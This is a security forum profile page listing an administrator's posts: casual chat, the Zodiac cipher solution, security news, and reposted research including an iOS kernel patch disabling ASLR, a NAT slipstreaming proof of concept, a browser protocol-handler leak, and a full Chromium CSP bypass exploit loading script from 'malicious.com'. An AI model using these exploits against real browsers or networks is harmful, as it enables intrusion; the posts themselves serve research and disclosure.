Jump to content

Nytro

Administrators
  • Posts

    18710
  • Joined

  • Last visited

  • Days Won

    700

Everything posted by Nytro

  1. Da, e si un film si o carte. Eu o sa caut cartea. Ca orice film/carte, nu e totul complet real, dar e bazat pe acele fapte.
  2. M-am gandit la tine Ma gandeam ca se rezolva rapid, la un service din zona. A iesit OK, pret final 700 RON, mai putin decat m-as fi asteptat. Pare sa mearga OK.
  3. Nytro

    Iphone 7

    Ca nu mai stii parola am intelege, dar nici mail-ul? Daca e al tau, incearca sa dai Forgot password pe toate adresele de mail pe care le folosesti, una tot trebuie sa fie.
  4. X-MAS CTF is a Capture The Flag competition organized by HTsP. This year we have prepared challenges from a diverse range of categories such as cryptography, web exploitation, forensics, reverse engineering, binary exploitation, hardware, algorithmics and more! We made sure that each category has challenges for every skill level, so that there is always something for everyone to enjoy and work on. This competition is using a dynamic scoring system, meaning that the more solves a challenge has, the less points it will bring to each of the solving teams. This system is put in place in order to keep the challenge score updated to its real difficulty level. Sursa: https://xmas.htsp.ro/home
  5. Da, oricum era prea tarziu, cel putin au "spart" acel mesaj. Desi nu pare tocmai SF, algoritmul nu era chiar foarte complicat, a fost extrem de complicat din cauza ca existau miliarde de posibilitati. Dar e frumos sa vezi un exercitiu de criptanaliza practic si real.
  6. Mi se pare genial. Va recomand. E chiar interesanta si povestea si cum a fost crackuit. Crypto in viata reala.
  7. On December 3rd, 2020, an international three-person team of codebreakers made a breakthrough with the Zodiac Killer's unsolved 340-character cipher. By December 5th, the team finished cracking the cipher and sent the solution to the FBI. This is the full message from the Zodiac Killer that was hidden in the 340-character cipher for 51 years: I HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH The members of the team that cracked the code are: * Sam Blake (Australia) * Jarl Van Eycke (Belgium) * David Oranchak (USA) This video is my attempt to tell the story of this long overdue breakthrough. More details are reported in Michael Butterfield's article here: http://zodiackillerfacts.com/news-and... Credits: Music: Dave Miles: Movement (ZapSplat: https://www.zapsplat.com/author/dave-...) “Thanks” animation: https://www.youtube.com/watch?v=l1whg... melissariveradesign.com Jim Dunbar show archival footage: https://www.youtube.com/watch?v=oTJI4... Mentioned in the video: AZDecrypt code breaking software by Jarl Van Eycke: http://zodiackillersite.com/viewtopic... Peek-a-boo cryptanalysis software by Heiko Kalista: http://www.zodiackillersite.com/viewt... Zkdecrypto by Brax Cisco et. al.: https://code.google.com/archive/p/zkd... Mike Morford’s Zodiac site: http://zodiackillersite.com Michael Butterfield’s Zodiac site: http://zodiackillerfacts.com Tom Voigt’s Zodiac site: http://zodiackiller.com http://zodiackillerciphers.com We dedicate these efforts to the victims of the Zodiac Killer, their families and descendants. We hope that one day justice will prevail.
  8. Nu stiu ce mizerii posteaza asta de mai sus. Uitati aici ce efecte are vaccinul: https://9gag.com/gag/a8GBWeQ (PS: caterinca, in caz ca unii nu se prind). E nasoala teoria cu Bill Gates... Iti dai seama cu ar fi sa aiba acel microchip? Ar avea clar Windows! Vrei sa te duci la cumparaturi? BSOD in mm! Vrei sa te culci? Stai in plm sa isi faca update! Nici nu vreau sa ma gandesc la cat de greu ti-ar merge corpul apoi...
  9. M-au sunat de la service, se pare ca l-am crapat destul de bine 1. Tastatura trebuie prinsa in nituri de plastic, cel putin 80%. Eu am topic cu pistolul de lipit o tasta veche si am bagat in cateva loguri, nu e ok asa 2. Banda aceea de la tastatura aparent trebuia lipta cumva de partea pe care sta tastatura. Eu am lasat-o "libera" si nici nu intra bine, a facut un scurt-circuit ceva si a prajit controllere video (nu am idee ce sunt alea) si de aceea nu vedeam nimic pe ecran 3. Se pare ca nici touchpad-ul nu merge, nu stiu exact de ce, probabil am tras tare de banda lui. Cel putin nu stricasem butonul de Power, ma simt expert Vestea buna: pare ca service-ul a gasit la parteneri palmrest cu tastatura si touchpad la vreo 360 RON. Ce gasisem eu pe net era peste 600 RON, deci stau bine. Si probabil luni o sa il am functional. Sper sa imi lipeasca si carcasa, "s-au rupt" vreo 2-3 surubele si partea din spate nu mai statea deloc Concluzie: nu ma mai bag la asa ceva, doar daca e ceva extrem de simplu. Poate nici atunci. Si mai invat si eu cate ceva despre hardware...
  10. Intradevar, traficul DNS poate fi "interceptat" de catre ISP, dar totusi... Oricum, pentru mai multa siguranta folositi DoH - DNS over HTTPS si ati rezolvat problema.
  11. DECEMBER 9, 2020 STEVE MOULD HACKS INTO HIS CAR WITH A HACKRF Over on YouTube popular science content creator Steve Mould has uploaded a video showing how he was able to open his own car using a HackRF software defined radio. In the video Steve first uses the Universal Radio Hacker software to perform a simple replay attack by using his HackRF (and also an RTL-SDR V3) to record the car's keyfob signal away from the car and replay it near the car. Steve goes on to note that most cars use rolling code security, so a simple replay attack like the above is impractical in most situations. Instead he notes how a more advanced technique called "rolljam" can be used, which we have posted about a few times in the past. Later in the video Steve interviews Samy Kamkar who was the security researcher who first popularized the rolljam technique at Defcon 2015. Sursa: https://www.rtl-sdr.com/steve-mould-hacks-into-his-car-with-a-hackrf/
  12. Four sentenced to prison for planting malware on 20 million Gionee smartphones Chinese quartet conspired to plant a malicious SDK inside an app that came preinstalled on Gionee devices. By Catalin Cimpanu for Zero Day | December 9, 2020 -- 02:40 GMT (02:40 GMT) | Topic: Security Image: Gionee Four Chinese nationals were sentenced last week to prison sentences for participating in a scheme that planted malware on devices sold by Chinese smartphone maker Gionee. The scheme involved Xu Li, the legal representative of Shenzhen Zhipu Technology, a Gionee subsidiary tasked with selling the company's phones, and the trio of Zhu Ying, Jia Zhengqiang, and Pan Qi, the deputy general manager and software engineers for software firm Beijing Baice Technology. According to court documents published last week by Chinese authorities, the two companies entered into a hidden agreement in late 2018 to create a powerful software development kit (SDK) that would allow the two parties to take control of Gionee smartphones after they were sold to customers. The SDK was inserted on Gionee smartphones by Shenzhen Zhipu Technology in the form of an update to Story Lock Screen, a screen-locker app that came preinstalled with Gionee devices. But Chinese officials said the SDK acted like a trojan horse and converted infected devices into bots, allowing the two companies to control customers' phones. The two companies used the SDK to deliver ads through a so-called "live pulling" function. THE TWO COMPANIES MADE $4.26 MILLION FROM ADS Court documents say that between December 2018 to October 2019, more than 20 million Gionee devices across the world received more than 2.88 billion "pull functions" (ads), generating more than 27.85 million Chinese yuan ($4.26 million) in profit for the two companies. The entire scheme appears to have come crashing down after a suspected bug started blocking access to some Gionee phone screens, which led the parent company's support staff to start an investigation, which then led to an official complaint with Chinese authorities. The four suspects were arrested in November 2019. According to reports from local media, the four didn't dispute the investigators' findings and pleaded guilty for reduced sentences. The quartet received prison sentences ranging from 3 to 3.5 years in prison and fines of 200,000 Chinese yuan ($30,500) each. Shenzhen Zhipu Technology also received a separate fine of 400,000 Chinese yuan ($61,000). A Gionee spokesperson did not return emails or phone calls seeking comment on the countries where the malware-laced smartphones were sold. Sursa: https://www.zdnet.com/article/four-sentenced-to-prison-for-planting-malware-on-20-million-gionee-smartphones/
  13. FireEye reveals that it was hacked by a nation state APT group By Sergiu Gatlan December 8, 2020 04:58 PM Leading cybersecurity company FireEye disclosed today that it was hacked by a threat actor showing all the signs of a state-sponsored hacking group. The attackers were able to steal Red Team assessment tools FireEye uses to test customers' security and designed to mimic tools used by many cyber threat actors. Attacker showed all the signs of a state-backed threat actor Top "Recently, we were attacked by a highly sophisticated threat actor, one whose discipline, operational security, and techniques lead us to believe it was a state-sponsored attack," Chief Executive Officer and Board Director Kevin Mandia said in a filing with the Securities and Exchange Commission (SEC). "Based on my 25 years in cyber security and responding to incidents, I’ve concluded we are witnessing an attack by a nation with top-tier offensive capabilities." The threat actor who breached FireEye's defenses specifically targeted FireEye's assets and used tactics designed to counter both forensic examination and security tools that detect malicious activity. The cybersecurity firm is still investigating the cyberattack with the collaboration of the Federal Bureau of Investigation and security partners like Microsoft. So far, initial analysis of the attack supports FireEye's conclusion that the company was the victim of a "highly sophisticated state-sponsored attacker utilizing novel techniques." State-sponsored hackers stole FireEye Red Team tools "During our investigation to date, we have found that the attacker targeted and accessed certain Red Team assessment tools that we use to test our customers’ security," Mandia added. "None of the tools contain zero-day exploits. Consistent with our goal to protect the community, we are proactively releasing methods and means to detect the use of our stolen Red Team tools." The stolen tools "range from simple scripts used for automating reconnaissance to entire frameworks that are similar to publicly available technologies such as CobaltStrike and Metasploit," FireEye said in a blog post on its Threat Research blog. However, many of them were already available to the broader security community or were distributed as part of FireEye's CommandoVM open-source virtual machine. The Red Team tools stolen in the attack haven't yet been used in the wild based on information collected since the incident and FireEye has taken measures to protect against potential attacks that will use them in the future: We have prepared countermeasures that can detect or block the use of our stolen Red Team tools. We have implemented countermeasures into our security products. We are sharing these countermeasures with our colleagues in the security community so that they can update their security tools. We are making the countermeasures publicly available on our GitHub. We will continue to share and refine any additional mitigations for the Red Team tools as they become available, both publicly and directly with our security partners. This GitHub repository contains a list of Snort and Yara rules that can be used by organizations and security professionals to detect FireEye's stolen Red Team tools when used in attacks. Government customers' information also targeted During the attack, the threat actor also attempted to collect information on government customers and was able to gain access to some FireEye internal systems. "While the attacker was able to access some of our internal systems, at this point in our investigation, we have seen no evidence that the attacker exfiltrated data from our primary systems that store customer information from our incident response or consulting engagements, or the metadata collected by our products in our dynamic threat intelligence systems," Mandia explained on FireEye's corporate blog. FireEye is a cybersecurity firm founded in 2004 with headquarters in Milpitas, California. It has over 8,500+ customers in 103 countries and more than 3,200+ employees worldwide. Sursa: https://www.bleepingcomputer.com/news/security/fireeye-reveals-that-it-was-hacked-by-a-nation-state-apt-group/
  14. Salut, cred ca mai degraba gasesti resurse pe Youtube: https://www.youtube.com/results?search_query=game+development
  15. Depix Depix is a tool for recovering passwords from pixelized screenshots. This implementation works on pixelized images that were created with a linear box filter. In this article I cover background information on pixelization and similar research. Example python depix.py -p images/testimages/testimage3_pixels.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o output.png Usage Cut out the pixelated blocks from the screenshot as a single rectangle. Paste a De Bruijn sequence with expected characters in an editor with the same font settings (text size, font, color, hsl). Make a screenshot of the sequence. If possible, use the same screenshot tool that was used to create the pixelized image. Run python depix.py -p [pixelated rectangle image] -s [search sequence image] -o output.png Algorithm The algorithm uses the fact that the linear box filter processes every block separately. For every block it pixelizes all blocks in the search image to check for direct matches. For most pixelized images Depix manages to find single-match results. It assumes these are correct. The matches of surrounding multi-match blocks are then compared to be geometrically at the same distance as in the pixelized image. Matches are also treated as correct. This process is repeated a couple of times. After correct blocks have no more geometrical matches, it will output all correct blocks directly. For multi-match blocks, it outputs the average of all matches. Sursa: https://github.com/beurtschipper/Depix
  16. ASLR & the iOS Kernel — How virtual address spaces are randomised Billy Ellis 11 hours ago·11 min read In this blog post I want to take a look at ASLR and how the iOS kernel implements it for user-space processes. We’ll cover: what ASLR actually is and how it aims to mitigate exploitation how the iOS kernel implements ASLR for apps & processes that are executed on the device a short experiment you can try that involves patching the iOS kernel to disable ASLR across all user-space processes! What is ASLR? ASLR stands for ‘Address Space Layout Randomisation’ — it is a security mitigation found in pretty much all systems today. It aims to make it difficult for an exploit developer to locate specific parts of a program in memory by randomising the memory address space of the program each time it is launched. This results in the exploit developer not being able to predict the memory location of variables and functions within their target, adding a layer of difficulty to common exploit techniques like Return Oriented Programming. The way ASLR implements this randomisation is by sliding the entire process address space by a given amount. This given amount is known as the ‘slide’ or the ‘offset’. The following diagram aims to illustrate how a process without ASLR compares to a process with ASLR. Looking at the diagram, Process A is loaded into memory at a static virtual address — 0x10000. Process A will always be loaded into memory starting at the same base address due to the lack of ASLR. This means that an attacker can easily predict where specific variables and functions will be in memory. Process B, on the other hand, is loaded into memory at starting at base address 0x14c00. This base address is dynamically calculated — every time Process B is launched, a slide value is generated at random and added to the static base address. In the diagram the random slide value used is 0x4c00. This value is added to the static base address — 0x10000 — which results in a new, randomised, base address. 0x10000 + 0x4c00 = 0x14c00 Every time Process B is launched, a new slide value will be chosen at random and therefore the base address (and the address of everything else in the binary) will be different each time. Unlike with Process A, an attacker cannot easily determine where in memory specific variables and functions will be located in Process B. This is the goal of ASLR. Note that the entire address space is shifted by the slide amount, resulting in variables and functions still being located at the same relative position to each other. This means that if the memory location of a single variable or function can be leaked, the address of everything else in the process can easily be calculated, thus defeating ASLR altogether. Exploit developers often rely on an information leak vulnerability — a bug that leaks a pointer from the target process — in order to defeat ASLR using this method. ASLR on iOS On iOS (and on most other operating systems) ASLR is implemented for both the kernel and the user-land processes. The kernel’s ASLR slide is randomised on every reboot. The slide value is generated by iBoot, the second stage boot-loader, during the boot process. For user-land processes, the ASLR slide is randomised every time a process is executed. Every user-space process has a unique slide. The slide value is generated by the kernel during the binary loading routine. In this blog post we will be focusing only on the user-land ASLR in iOS, and more specifically how the kernel implements it. The iOS kernel is based on XNU, and XNU is open source. This makes it fairly easy to look into how parts of the iOS kernel work as we can refer directly to the source code. The iOS kernel isn’t a direct result of compiling XNU however. Apple adds new, iOS-specific, code to XNU and these parts are kept closed source, although referring to the XNU source code is generally still very useful for getting a high-level understanding of parts of the iOS kernel code base. The function load_machfile() in bsd/kern/mach_loader.c in XNU is responsible for parsing a given Mach-O file (the executable format used on iOS) and setting up a new task, loading it into memory etc. Every time you open an app or run a binary on your iPhone, this function is called in the kernel. It’s in this function that the ASLR slide for the new process is generated. In load_machfile(), after the initial setup of creating a new pmap and vm_map for the to-be process, we reach the code responsible for generating the ASLR slide. There’s actually two ASLR slide values being generated here — one for the new process and one for dyld. Both are generated in the same way. Firstly, a random 32-bit value is generated by the call to random(). Secondly, this random value is ‘trimmed’ down so that it does not exceed the maximum slide value. On 32-bit, this value gets trimmed down to just one byte. On 64-bit it’s two. Thirdly, the trimmed value is shifted left by an amount depending on the host’s page size. The resulting value is the ASLR slide. For example: random() returns 0x3910fb29 2. Value 0x3910fb29 is trimmed down to 0x29(assuming 32-bit OS) 3. Byte 0x29 is shifted left by 0x12 (the page shift amount) The resulting 0x29000 is the ASLR slide value that will be used for this new process. Shortly after the slide values are generated, load_machfile() calls into another function — parse_machfile(). This function is much larger and proceeds to load each Mach-O segment into the virtual memory space, perform code-signing-related tasks and ultimately launch the new process. To see ASLR in effect, compile the following program on your iOS device. #include <stdio.h> #include <string.h>char *str = "HELLO ASLR";int main() { printf("ptr %p\n", str); return 0; } This code prints a pointer (using the %p format specifier) to a static char array stored in the binary. Compile this code using the -fpie flag. This flag enables the code to be ‘position independent’ — essentially meaning it supports address space randomisation. This should actually be enabled automatically and, in fact, 64-bit iOS enforces it. If you’ve ever dealt with ASLR on 64-bit iOS, you may have noticed that compiling a binary with -fno-pie (to disable position independent code) has no effect — all processes are launched with ASLR regardless. If you run the above program a few times, you’ll notice that the pointer to the static char array changes on each new execution. This is due to a new slide value being generated by the kernel each time. You may also notice that the three right-most hexadecimal digits remain the same — this makes sense as we know from the kernel code that the format of the slide value will always be 0xXX000. Patching the iOS kernel A nice experiment you can try given the knowledge above is to actually patch the iOS kernel so that ASLR is disabled system wide. This is fairly straightforward to do — only a single instruction needs to be changed in the kernel in order for the ASLR slide to always be set to 0x0. With a patch like this applied, all apps and processes executed (even those compiled with -fpie) will be mapped into memory at their static binary mapping. This can even be potentially useful for other debugging/reversing tasks on iOS — having ASLR disabled at the kernel level can save you time having to recompile programs with the -fno-pie flag, or having to modify AppStore apps in order to run them without ASLR. Unfortunately, due to KPP/KTRR on 64-bit iOS preventing us from writing to the __TEXT segment (the code section) of the kernel, we’ll be limited to using a 32-bit jailbroken device for this exercise. You could apply the same patch in a static 64-bit kernel cache and boot the custom kernel on a device using an exploit like checkm8. But in this blog I’ll stick to patching it dynamically on 32-bit iOS 9.0 on my iPhone 5C. Yeah, I guess 32-bit iOS is a bit redundant these days, but oh well. It’s still a cool little experiment to try out. The first step is to locate the load_machfile() function in the iOS kernel for your chosen device. Unfortunately the symbol for this function isn’t available in the RELEASE kernels so I had to locate it by searching for specific instruction patterns and using cross-references from other functions that do have symbols. Locating the specific code is beyond the scope of this post, but if you’d like to see a similar reverse engineering task where I go into detail about locating a specific part of kernel code, check out my previous blog — https://medium.com/@bellis1000/exploring-the-ios-screen-frame-buffer-a-kernel-reversing-experiment-6cbf9847365 Here’s a snippet of the assembly code (taken from Ghidra) responsible for generating the ASLR slide. This is from the same part of code in the load_machfile() function that we looked at previously. The same three steps used to generate the slide are handled here, although for the initial random value generation, read_random() is being called instead of random(). There’s quite a bit of flexibility here with how we go about applying a patch to this — we just need to set the slide value to 0x0, every time. That’s the aim. It doesn’t really matter how we do it. You could: NOP-out this whole section of code so there’s no random generation at all patch read_random() to always return 0x0, so the random number isn’t actually random overwrite the random slide value with 0x0 right after it is generated The method I‘m choosing is to patch the instruction bic r0, r1, 0x80000000. This instruction performs a bitwise AND operation on R1 and value 0x80000000. This is the last time the slide value (held in R0) is modified before it is passed to vm_map_page_shift(). If we can set the value to 0x0 just before the call to vm_map_page_shift() we will effectively disable ASLR. If the value is 0x0, shifting it by any amount — left or right — will still result in 0x0. The ARM instruction bic r0, r1, 0x80000000 is represented by four bytes — 21 f0 00 40. This part of the kernel is actually in Thumb mode (making use of a combination of 16-bit and 32-bit instructions) so we must be careful to replace the instruction with the same amount of bytes to avoid messing up the alignment. The instruction I want to replace it with is movs r0, 0x0 — this will reset the value of R0 to 0x0, thus overwriting the random bytes used for the slide. However, this instruction is represented by only two bytes — 00 20— not four. This isn’t really a problem though. All we need to do is replace the bic r0, r1, 0x80000000 instruction with two of the movs r0, 0x0 instructions so that we make up the amount of bytes. So essentially: bic r0, r1, 0x80000000 becomes: movs r0, 0x0 movs r0, 0x0 The first time movs r0, 0x0 is executed, R0 will be set to zero. The second time it is executed nothing happens. It essentially acts as a NOP (no-operation) instruction. It does the exact same thing again, leaving no visible change in the register state. I wrote a program that applies this patch to the kernel using vm_write() from the Mach API. I have the instructions hard-coded — both the bic r0, r1, 0x80000000 and the two movs r0, 0x0 joined together. #define DISABLE_BYTES 0x20002000 // movs r0, 0x0 x 2 #define ENABLE_BYTES 0x4000f021 // bic r0, r1, 0x80000000 This allows me to easily disable and re-enable ASLR. All I have to do is patch the instruction with DISABLE_BYTES to disable ASLR, and un-patch the instruction by restoring the original bytes (using ENABLE_BYTES) to enable it again. I also have the address of the target instruction. #define INSTR_TO_PATCH_ADDR 0x802a3cc4 This address is specific to the iOS 9.0 kernel for iPhone5,4. If you want to try this yourself, you’ll need the address of this same instruction but for whichever kernel and device you’re using. The code then simply reads from the instruction address to determine whether or not ASLR is currently enabled or disabled, and then applies the patch by writing the opposite set of bytes to toggle it. Below is the code for this program. uint32_t slide = get_kernel_slide(); printf("[+] KASLR slide is %08x\n", slide); uint32_t current_bytes = do_kernel_read(INSTR_TO_PATCH_ADDR + slide); printf("[+] Current bytes %08x\n", current_bytes); if (current_bytes == ENABLE_BYTES) { do_kernel_write(INSTR_TO_PATCH_ADDR + slide, DISABLE_BYTES); printf("[+] Patched ASLR random instruction. ASLR disabled.\n"); } else { do_kernel_write(INSTR_TO_PATCH_ADDR + slide, ENABLE_BYTES); printf("[+] Patched ASLR random instruction. ASLR enabled again.\n"); } Note: the functions get_kernel_slide(), do_kernel_read() & do_kernel_write() are all wrapper functions for Mach API calls that I have written. The code for these will be available on Github. Now to see this code in action! We’ll first run the test program a few times to verify that ASLR is enabled. The addresses are randomised each time. Now we run the pwn_aslr program to patch the kernel code. The bic r0, r1, 0x80000000 instruction has been patched and ASLR has been disabled. Now we re-run the test program to verify. Now the addresses are static! The kernel patch worked and ASLR is no longer in effect. Here’s a quick demo video showing the above in real time https://youtu.be/D_pnGfTMYUI. The code for this tool is available on my Github if you want to explore it yourself. As I mentioned, you’ll need to find the address of the kernel instruction you want to patch for the specific device + kernel combination you’re using, unless you’re using iOS 9.0 on iPhone5,4. You could also probably implement something similar on 64-bit if you use Luca Todesco’s KPP bypass or Brandon Azad’s A11 KTRR bypass. Link to the code — https://github.com/Billy-Ellis/aslr-kernel-patch Feedback always welcome. Thanks! — Billy Ellis @bellis1000 Sursa: https://bellis1000.medium.com/aslr-the-ios-kernel-how-virtual-address-spaces-are-randomised-d76d14dc7ebb
  17. This talk will reveal the iOS 13 exploits I showcased earlier on Twitter (@08Tc3wBB) – an exploit chain for iOS 13.7 that relies upon a different kernel vulnerability since the 13.6 update patched the old one. I’ll be talking about the root cause and techniques used during the exploit development to bypass the mitigations that are unique to iOS to ultimately get the privilege of reading and writing kernel memory. === 08Tc3wBB is a Bug Bounty Hunter and a Security Researcher.
      • 1
      • Upvote
  18. Slipstream This is a proof of concept for the NAT slipstreaming vulnerability discussed here. Building slipstream has no external dependencies and does not depend on CGO. You can build the executable and/or cross compile for other platforms using the go compiler with the following command: go build Usage slipstream will produce a single executable that is both the server and client. You must first setup the server on a remote host that it outside of your NAT: ./slipstream -l -lp 5060 You can then use slipstream to connect to the host outside of your NAT and let it attempt to connect back to you: ./slipstream -ip <local ip> -host <remote host> -rp 5060 -lp <local port> Why another implementation? After spending many hours attempting to get the original code working with no success I was left at a point of not knowing if my router was simply not vulnerable, I had misconfigured the code, the code was broken, or there were other implementation details stopping it from working. Eventually I was shown another implementation of the attack that skipped over the web based delivery instead focusing just on exploitation of the ALGs. This code is heavily based on that implementation though provides an end to end client and server to make testing simpler and avoids using an HTTP client to send the request due to issues discovered. What about web based delivery? At time of writing the major browser vendors (Chromium and Firefox) have since provided mitigations against this through blocking outbound connections to port 5060. It's theoretically possible that this could be bypassed by switching to a different port or attempting to use a different ALG altogether. I'm assuming SIP was chosen due to it's similarity to HTTP and widespread use. In testing some of the higher end enterprise gear we discovered that due to slight differences (the / used in the HTTP path, the HTTP version, rather than SIP/2.0, and differing headers) some networking equipment fails to parse the SIP requests generated by an HTTP client and simply drops them at the router. Given that it's been blocked by browsers and delivery is unreliable by HTTP client no attempt was made to port the newer webscan technique for local ip discovery for web based delivery or identify a browser bypass. License MIT Sursa: https://github.com/jrozner/slipstream
      • 1
      • Upvote
  19. Leaking Browser URL/Protocol Handlers By Rotem Kerner | December 03, 2020 FortiGuard Labs Threat Research Report Affected platforms: Windows, Linux Impacted parties: Chrome, Firefox and Edge Impact: Leaking sensitive data Severity level: Medium Assigned CVEs: CVE-2020-15680 An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target. In this post we will discuss what are protocol handlers and disclose two information disclosure vulnerabilities affecting three major browsers (namely - Firefox, Edge and Chrome). Exploiting these vulnerabilities will enable a remote attacker to identify the presence of a vast amount of applications that may be installed on a targeted system. Overview - What Are Protocol Handlers? Generally speaking when talking about Protocol Handlers we are referring to a mechanism which allows applications to register their own URI scheme. This enables the execution of processes through the use of URI formatted strings. The Windows OS manages custom URL handlers under the following key- HKEY_CURRENT_USER\SOFTWARE\Classes\* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\* HKEY_CLASSES_ROOT\* When a URL Handler is invoked the OS is searching within those locations for keys containing values with the name “URL Protocol”. For instance, we can use regedit to inspect the path at HKEY_CLASSES_ROOT\msteams and see that it contains the special Value of “URL Protocol”. Figure 1 Looking further into HKEY_CLASSES_ROOT\msteams\shell\open\command\ we can see the actual command that gets invoked - Figure 2 Figure 3 In this example the browser will launch Teams.exe when a url that starts with “msteams” is clicked. Web browsers will enable their users to click on links with non-http schemes which will result in prompting the user with a message box asking them if they want to let another application handle this URL. Figure 4 Though it requires user interaction and thus poses a limited risk, it expands the attack surface beyond the browser borders. An attacker could craft a special web page which triggers another potentially vulnerable application. In some cases, such attacks may bypass protection measures such as Smart Screen and other security products. While exploring the potential of attacking the browsers through the different protocol handlers I got curious as to whether web browsers somehow disclose what protocols handlers exist on a targeted system. The short answer is yes. Leaking Protocol Handlers In this section we disclose how both Chrome, Edge and Firefox were circumvented in order to disclose which protocol handlers exist on a targeted system. It's worth mentioning that these findings are the result of manually playing with HTML/CSS components with the emphasis on finding a difference in behavior when referring (using some elements) to existing and non-existing URL handlers. The environment I’ve been testing on is Windows 10 but it is fair to assume that the same vulnerabilities exist on other platforms (such as Linux and Mac). Leaking Firefox protocol handlers (CVE-2020-15680) This vulnerability has been tested on Firefox 78.0.1 (64-bit) under Windows 10. To leak the protocol handlers in Firefox we leverage differences in the way firefox renders images sourced from existing and non-existing protocol handlers. For example, if we will try to load a web page containing the following element - And observe the elements styling using developer tools we would see that the default styling for broken images generate element with size of 24x24 as can be seen in Figure-5. Figure 5 Unlike the example above, if we try and create an image element and set source to some non-existent handler like the following. This will result with an element with different sizing of 0x0 as can be seen in Figure-6. Figure 6 This difference can be measured using a simple JS script Basing on this a malicious actor may perform a brute-force attack to disclose the different protocol handlers on a targeted system. The following example code will print whether a handlers exists or not on a targeted system. Leaking Chrome and Edge protocol handlers This vulnerability has been tested on Chrome 83.0.4103.116 under Windows 10. The exploitability of this vulnerability may be less stealthy but still yields equivalent results as the Firefox vulnerability. The mechanism here was different than the one in Firefox, here we leverage the fact that the window lose focus whenever the user is challenged with the message box as can be seen in figure-7. Figure 7 So, in order to detect if a given handler exists on the victim we take the following steps. First, we dynamically generate a link that is made of the scheme we would like to detect like such - Then we trigger the link and detect whether the document has focus: That will work for a one time check however if we would like to brute force an entire list of handlers we would have to get rid of the message box every time it pops up or else the document.hasFocus() will always return true. Figure 8 The technique we came up with was to redirect the user to an entirely different domain/ip which will eliminate any previously opened message box. Figure-8 draws the general idea of how the flow should be carried out in order to work. Protocol Handler Test page performs the actual test and saves the results to the back-end. In case the handler exists, it will redirect to “Redirect-Back Page” which exists on domain2.com. The redirection will get rid of the message box. Finally, back to the Protocol Handler Test Page for the next handler test. Vulnerabilities Impact Such information disclosure vulnerability could be exploited in several different ways. Here are some examples: Identifying communication channels: By listing the handlers an attacker can get a hint to what platforms he may use for reaching the targeted user. For instance, detecting social applications such as Slack, Skype, WhatsApp or Telegram may be used for communicating with the target. General reconnaissance: A wide range of applications nowadays uses custom URL handlers and can be detected using this vulnerability. Some examples: music players, IDE, office applications, crypto-mining, browsers, mail applications, antivirus, video conferencing, virtualizations, database clients, version control clients, chat clients, voice conference apps, shared storages Pre-exploitation detection: Exploit kits may leverage this information in order to identify if a potentially vulnerable application is present without exposing the vulnerability itself. Detecting Security solutions: Many security solutions such as AV products register protocol handlers whose presence can be exposed by leveraging the vulnerabilities because they have custom protocol handlers installed. Attackers may use this to further customize their attack to be able to circumvent any protection mechanism set by those security solutions. User Fingerprinting: reading what protocol handlers exist on a system may also be used in order to improve browser/user fingerprinting algorithms. Vendor Response Below is a table specifying the vendor responses: Vendor Vendor Response Mozilla The security team at mozilla were quick to respond and have issued a fix for the bug. - CVE-2020-15680 Microsoft The vendor decided not to fix the issue due to the following explanation - “This is by design (and not a security issue) - if we want to support registered protocol handler links from the browser, it seems like there'll be various ways to detect whether a link for a particular protocol handler worked or not” Google The vendor decided to treat this as a “user fingerprinting issue” rather than a security issue and are working on a patch. “The general consensus on the security team is that none of the concerns here relate to leaking user data, and that this is best handled as a fingerprinting bug” Summary In this post we uncovered a new type of information disclosure vulnerabilities in Chrome, Edge and Firefox and identified how attackers can leverage them to gain valuable insights which could assist them in compromising their targets. When browsers are enabling the interaction with other applications through URL handlers, they may be easing the engagement with third party software, but they also enable a wider attack surface by giving the attacker a chance to attack the user through other applications. While Microsoft and Google currently don't consider it a security issue, we believe that being able to expose the presence of other software, including security software, on targeted devices should be prevented. With that being said, we anticipate that in the near future we shall see an increase in the number of attacks which exploit the different URL handlers through the user's web browser. FortiEDR can detect and block these browser-based exploits and provide visibility into such attempts. Sursa: https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-handlers
      • 1
      • Upvote
  20. #Title: Chromium 83 - Full CSP Bypass #Date: 02/09/2020 #Exploit Author: Gal Weizman #Vendor Homepage: https://www.chromium.org/ #Software Link: https://download-chromium.appspot.com/ #Version: 83 #Tested On: Mac OS, Windows, iPhone, Android #CVE: CVE-2020-6519 (function(){ var payload = ` top.SUCCESS = true; var o = document.createElement("object"); o.data = \`http://malicious.com/bypass-object-src.html\`; document.body.appendChild(o); var i = document.createElement("iframe"); i.src = \`http://malicious.com/bypass-child-src.html\`; document.body.appendChild(i); var s = document.createElement("script"); s.src = \`http://malicious.com/bypass-script-src.js\`; document.body.appendChild(s); `; document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>"; setTimeout(() => { if (!top.SUCCESS) { XXX.contentWindow.eval(payload); } }); }()) // further information: https://github.com/weizman/CVE-2020-6519 Sursa: https://www.exploit-db.com/exploits/49195?utm_source=dlvr.it&utm_medium=twitter
